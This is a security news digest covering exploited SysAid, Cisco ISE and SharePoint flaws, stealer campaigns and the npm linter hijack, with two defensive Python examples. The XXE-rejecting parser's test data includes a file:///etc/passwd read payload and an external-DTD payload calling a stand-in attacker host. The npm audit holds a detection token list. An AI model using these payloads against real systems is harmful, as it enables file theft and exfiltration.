Programmer’s Digest #144
07/16/2025-07/23/2025 SysAid Vulnerability Exploitation, Active Exploitation Of ISE and ISE-PIC Flaws, npm Linter Packages Hijacked And More.
1. CISA Warns of SysAid Vulnerability Exploitation
CISA has added two recently patched SysAid On-Prem vulnerabilities, CVE-2025-2776 and CVE-2025-2775, to its Known Exploited Vulnerabilities (KEV) catalog. Patched in March 2025 in version 24.4.60 of SysAid’s ITSM software, the flaws are pre-authentication XML external entity (XXE) issues discovered by WatchTowr in December 2024.
WatchTowr published proof-of-concept (PoC) exploit code in May 2025 and warned that the XXE bugs could be chained with CVE-2024-36394, a separate OS command injection flaw, to achieve unauthenticated remote command execution. CVE-2024-36394 itself has not been added to the KEV catalog, so teams that prioritize patching by KEV entries alone should still confirm they are covered against it.
SysAid claims over 10 million users worldwide, though only 77 vulnerable internet-exposed instances were identified at disclosure. CISA notes there’s no evidence these flaws have been used in ransomware attacks. However, SysAid products have been previously targeted—most notably in 2023 by Cl0p ransomware exploiting a zero-day (CVE-2023-47246).
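As an added illustration of the pre-authentication XXE class behind the SysAid CVEs (example code written for this digest, not SysAid’s or WatchTowr’s, and assuming nothing about SysAid’s endpoints), the Python below parses XML from an unauthenticated client while refusing any DOCTYPE, which makes both the classic file-read payload and the external-DTD (blind/out-of-band) shape inert before any entity is expanded. The request bodies are constructed for the demo. Python’s expat parser does not fetch external entities on its own; the point shown is the policy a pre-auth XML endpoint should enforce, which Java parsers express with the `http://apache.org/xml/features/disallow-doctype-decl` feature.

```python
"""Added example, not SysAid's or WatchTowr's code: parse XML from an
unauthenticated client while refusing DTDs, which is what makes the
XXE payload class described above inert.  Payloads below are constructed."""
import xml.parsers.expat as expat


class DtdForbidden(ValueError):
    """The document carried a DOCTYPE or entity declaration."""


def parse_untrusted_xml(data: bytes) -> dict[str, str]:
    """Return {element-path: text} for leaf elements, or raise DtdForbidden.

    XXE needs a DOCTYPE to declare the entity (SYSTEM "file:///..." or a
    remote DTD for blind/out-of-band variants).  Refusing the DOCTYPE
    itself removes the whole class instead of filtering entity values.
    """
    parser = expat.ParserCreate()
    fields: dict[str, str] = {}
    path: list[str] = []
    has_children: list[bool] = []
    text: list[str] = []

    def forbid(*_args):
        raise DtdForbidden("DOCTYPE/ENTITY declarations are not accepted")

    def start(name, _attrs):
        if has_children:
            has_children[-1] = True
        has_children.append(False)
        path.append(name)
        text.clear()

    def end(_name):
        if not has_children.pop():           # leaf element: record its text
            fields["/".join(path)] = "".join(text).strip()
        text.clear()
        path.pop()

    parser.StartDoctypeDeclHandler = forbid   # fires before any entity is used
    parser.EntityDeclHandler = forbid
    # Defence in depth: if a DTD ever got through, returning 0 makes expat
    # abort instead of resolving the external reference.
    parser.ExternalEntityRefHandler = lambda *_args: 0
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return fields


def rejects(data: bytes) -> bool:
    """True if the parser refused the document because of a DTD."""
    try:
        parse_untrusted_xml(data)
    except DtdForbidden:
        return True
    return False


# Constructed sample requests for the demo (not real SysAid traffic).
BENIGN_LOGIN = b"<login><user>alice</user><otp>123456</otp></login>"
XXE_FILE_READ = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<login><user>&xxe;</user></login>"
)
XXE_EXTERNAL_DTD = (   # blind/out-of-band shape: the DTD itself is remote
    b'<!DOCTYPE r SYSTEM "http://attacker.invalid/evil.dtd">'
    b"<login><user>x</user></login>"
)

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN_LOGIN))
    for payload in (XXE_FILE_READ, XXE_EXTERNAL_DTD):
        print("rejected" if rejects(payload) else "ACCEPTED")
```

Rejecting the DOCTYPE outright is the only robust fix; allow-listing entity names or stripping `SYSTEM` keywords is bypassable. The chained OS command injection mentioned above is a separate bug and is not addressed by parser hardening.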
2. Cisco Confirms Active Exploitation Of ISE and ISE-PIC Flaws
Cisco has confirmed active exploitation of critical vulnerabilities in its Identity Services Engine (ISE) and Passive Identity Connector (ISE-PIC), observed in July 2025. The flaws—CVE-2025-20281, CVE-2025-20282, and CVE-2025-20337—allow unauthenticated remote attackers to execute arbitrary code with root privileges.
The company warns that attackers are targeting these vulnerabilities in the wild and strongly urges customers to upgrade to fixed software versions. CVE-2025-20281 and CVE-2025-20282 (both CVSS 10) affect ISE/ISE-PIC 3.3 and later, and 3.4 only, respectively: the first stems from insufficient validation of user-supplied input in an exposed API, the second from insufficient file validation in an internal API that lets an attacker upload files into privileged directories.
CVE-2025-20337, patched last week, is similar to CVE-2025-20281 and also allows root-level code execution. All three flaws stem from improper validation mechanisms, making it possible to upload malicious files or send crafted API requests.
3. Microsoft Releases Urgent Patch for SharePoint RCE Flaw Exploited in Ongoing Cyber Attacks
Microsoft has released patches for CVE-2025-53770, a critical remote code execution flaw (CVSS 9.8) in on-premises SharePoint Server that is being actively exploited in the wild. The flaw stems from deserialization of untrusted data. A related spoofing vulnerability, CVE-2025-53771 (CVSS 7.1), was disclosed and patched at the same time, with what Microsoft describes as more robust protections than the earlier fix.
Both issues are variants of earlier flaws (CVE-2025-49704 and CVE-2025-49706) that were used in the ToolShell exploit chain and patched in the July 2025 Patch Tuesday release; Microsoft noted that CVE-2025-53770 is a variant of CVE-2025-49706. Servers that received only the July Patch Tuesday fix therefore remained exploitable until the new update.
Only on-premises SharePoint versions are affected, including Server 2016, 2019, and Subscription Edition. SharePoint Online is unaffected.
Customers are urged to apply the latest updates, enable AMSI in Full Mode, rotate ASP.NET machine keys, and restart IIS. The key rotation is not optional hardening: the exploit chain gives attackers access to the server’s machine keys, which let them forge valid ASP.NET ViewState payloads and keep executing code on an otherwise patched server until the keys change. Over 50 organizations, including banks and universities, have reportedly been compromised since July 18.
CISA has added CVE-2025-53770 to its Known Exploited Vulnerabilities catalog, mandating fixes for U.S. federal agencies by July 21, 2025.
4. EncryptHub Targets Web3 Developers Using Fake AI Platforms to Deploy Fickle Stealer Malware
Threat actor EncryptHub (aka LARVA-208/Water Gamayun) is targeting Web3 developers with stealer malware, using fake AI platforms like “Norlax AI” to lure victims through job offers and portfolio reviews. Swiss firm PRODAFT revealed the attackers trick targets into clicking meeting links sent via X, Telegram, or job board Remote3. An initial Google Meet call builds trust before redirecting victims to Norlax AI, where a fake audio driver error prompts malware download.
The malware, disguised as a Realtek audio driver, uses PowerShell to deploy Fickle Stealer, harvesting crypto wallets and dev credentials, then sending them to a server dubbed SilentPrism. This marks a shift in EncryptHub’s tactics from ransomware to data theft and resale.
5. Popular npm Linter Packages Hijacked via Phishing to Drop Malware
Several widely used JavaScript libraries, including eslint-config-prettier (30M+ weekly downloads), were hijacked in a supply chain attack after the maintainer, JounQin, fell for a phishing email mimicking npm support. Other impacted packages include eslint-plugin-prettier, synckit, @pkgr/core, and napi-postinstall.
On July 18, developers noticed suspicious versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7 of eslint-config-prettier on npm with no corresponding commits or releases in the GitHub repository. The attacker used the stolen npm token to publish versions carrying a malicious postinstall script that ran install.js, which in turn loaded a trojanized DLL (node-gyp.dll) through Windows’ rundll32.
At the time of writing, the malicious DLL is flagged by only 19 of 72 antivirus engines on VirusTotal.
Security researcher MalwareUtkonos also flagged a similar compromise of the got-fetch package by a different maintainer, suggesting the same threat actor is behind both attacks. That maintainer has since archived the GitHub repo and deprecated all versions.
Developers are urged to review affected packages, avoid installing the compromised versions, and treat any Windows host on which one of them was installed as potentially compromised, since the payload ran automatically during npm install.
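As an added example (code written for this digest, not from the affected projects or the researchers cited), the Python below audits an npm dependency tree for the two signals in this story: a locked dependency at a version the hijacker published, and an installed package that runs a lifecycle script at npm install time. The lockfile and node_modules tree are constructed in a temporary directory so it runs offline, and the postinstall command in the sample is an assumption for the demo. The only affected versions it knows are the eslint-config-prettier ones named above; the other hijacked packages are carried by name only, because their affected versions are not given here.

```python
"""Added example (not from the affected projects or the cited researchers):
audit an npm tree for versions named in the report and for packages that run
code at install time.  Sample lockfile and node_modules are constructed."""
import json
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Versions the report identifies as published by the hijacker.
KNOWN_BAD_VERSIONS = {
    "eslint-config-prettier": {"8.10.1", "9.1.1", "10.1.6", "10.1.7"},
}
# Packages the report names as hijacked without listing versions here.
WATCHLIST = {"eslint-plugin-prettier", "synckit", "@pkgr/core",
             "napi-postinstall", "got-fetch"}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
# Strings matching the observed behaviour (install.js launching a DLL via rundll32).
SUSPICIOUS_TOKENS = ("rundll32", ".dll", "install.js")


@dataclass(frozen=True)
class Finding:
    package: str
    version: str
    reason: str


def audit_lockfile(lock: dict) -> list[Finding]:
    """Check the 'packages' map of a lockfileVersion 2 or 3 package-lock.json."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:                      # "" is the root project itself
            continue
        # "node_modules/a/node_modules/@scope/b" -> "@scope/b"
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        version = meta.get("version", "")
        if version in KNOWN_BAD_VERSIONS.get(name, ()):
            findings.append(Finding(name, version, "version published by the hijacker"))
        elif name in WATCHLIST:
            findings.append(Finding(name, version,
                                    "maintainer compromised; verify version against the advisory"))
    return findings


def audit_install_hooks(node_modules: Path) -> list[Finding]:
    """Flag installed packages whose package.json runs a script during install."""
    findings = []
    for manifest in sorted(node_modules.glob("**/package.json")):
        try:
            pkg = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        scripts = pkg.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            hits = [t for t in SUSPICIOUS_TOKENS if t in cmd.lower()]
            reason = f"{hook} hook: {cmd}"
            if hits:
                reason += f" (matches {', '.join(hits)})"
            findings.append(Finding(pkg.get("name", manifest.parent.name),
                                    pkg.get("version", ""), reason))
    return findings


def build_demo_tree(root: Path) -> tuple[dict, Path]:
    """Write a constructed lockfile + node_modules that mirror the incident."""
    manifests = [
        {"name": "eslint-config-prettier", "version": "10.1.7",      # hijacked version
         "scripts": {"postinstall": "node install.js"}},           # assumed hook for the demo
        {"name": "synckit", "version": "0.11.8"},                    # on the watchlist (sample version)
        {"name": "left-pad", "version": "1.3.0",                     # benign control
         "scripts": {"test": "node test.js"}},
    ]
    node_modules = root / "node_modules"
    lock = {"name": "demo", "lockfileVersion": 3, "packages": {"": {"name": "demo"}}}
    for pkg in manifests:
        pkg_dir = node_modules / pkg["name"]
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(pkg), encoding="utf-8")
        lock["packages"][f"node_modules/{pkg['name']}"] = {"version": pkg["version"]}
    return lock, node_modules


def run_demo() -> list[Finding]:
    """Build the sample tree in a temp dir and return every finding."""
    with tempfile.TemporaryDirectory() as tmp:
        lock, node_modules = build_demo_tree(Path(tmp))
        return audit_lockfile(lock) + audit_install_hooks(node_modules)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f.package}@{f.version}: {f.reason}")
```

Lifecycle hooks are common in legitimate packages (native builds, binary downloads), so the hook list is a review queue rather than a verdict. The blocking control is to run `npm ci --ignore-scripts` (or set `npm config set ignore-scripts true`) in CI and on developer machines, and to handle the few packages that genuinely need a build step explicitly.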
6. Hackers Use GitHub Repositories to Host Amadey Malware and Data Stealers, Bypassing Filters
Threat actors are abusing public GitHub repositories to host malicious payloads and distribute them via Amadey malware. The campaign involves fake GitHub accounts hosting Amadey plugins and tools, delivered using the Emmenhtal loader (aka PEAKLIGHT). The campaign mirrors a February 2025 phishing attack that distributed SmokeLoader via Emmenhtal, targeting Ukrainian organizations. In this latest campaign, Emmenhtal delivers Amadey, which can collect system data and deploy payloads like Lumma, RedLine, and Rhadamanthys Stealers. Some JavaScript and Python scripts in the GitHub repos are updated versions of Emmenhtal loaders.
GitHub has since taken down the fake accounts, but the activity reflects broader malware-as-a-service (MaaS) abuse of trusted platforms.
Meanwhile, Trellix reported SquidLoader targeting financial firms in Hong Kong. It employs advanced anti-analysis features and drops Cobalt Strike beacons.